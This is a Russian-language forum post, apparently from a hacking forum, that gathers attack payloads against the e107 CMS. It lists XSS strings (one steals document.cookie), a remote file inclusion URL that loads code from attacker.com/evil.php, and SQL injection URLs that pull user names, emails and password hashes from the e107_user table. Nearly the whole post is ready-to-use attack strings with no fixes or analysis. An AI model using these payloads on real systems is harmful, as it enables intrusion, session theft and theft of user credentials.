|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
Multiple XSS in Chatbox, forum posts:
Код HTML:
[img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email]/foo_at_bar.com"onmouseover="alert('Vulnerable');[/email]
[url]/url.htm" onmouseover="alert('Vulnerable');[/url]
e107 Subject field HTML injection Vulnerability
Код:
In Submit comment:
Subject: '><script>alert(/XSS/)</script>
0.545 & 0.603
e107 with the Chatbox.php (tagboard) module enabled.DoS.
In the Name inputbox of the Chatbox type:
Код:
<script = javascript> alert('DoS') <script>
6.*
Html attachment:
Код:
<html>
<body>
<script>alert('VULN');</script>
</body>
</html>
XSS Vulnerability in "Netquery" (nquser.php) plugin.
Код:
GET http://virtech.org/e107/e107_plugins/netquery/nquser.php HTTP/1.0
Accept: */*
Referer: http://virtech.org/tools/
Accept-Language: en-us
Pragma: no-cache
User-Agent: <script>alert()</script>
Host: virtech.org
Proxy-Connection: Keep-Alive
Cookie: e107_tdOffset=32630; e107_tdSetTime=1159974893; e107_tzOffset=420
Content-length: 0
0.6.15
XSS in "user settings" (usersettings.php):
Код:
http://target/e107_0615/usersettings.php?avmsg=[xss code here]
XSS Vulnerability in "Clock Menu" (clock_menu.php) plugin.
Код:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Other RFI:
0.6.15
Код:
http://target/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Other Sql injection:
0.6.15
Sql injection bug in " news.php":
Код:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
Sql injection bug in " content.php":
Код:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*
Код:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
Последний раз редактировалось ettee; 07.10.2007 в 14:48..
|